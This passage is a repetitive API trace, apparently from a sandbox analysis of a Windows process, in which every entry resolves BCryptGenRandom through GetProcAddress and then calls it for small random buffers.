pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0260.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a7c, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a01a7c) returned 0x0 [0260.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a95, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a01a95) returned 0x0 [0260.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01aaf, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a01aaf) returned 0x0 [0260.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01acd, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a01acd) returned 0x0 [0260.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.353] GetProcAddress 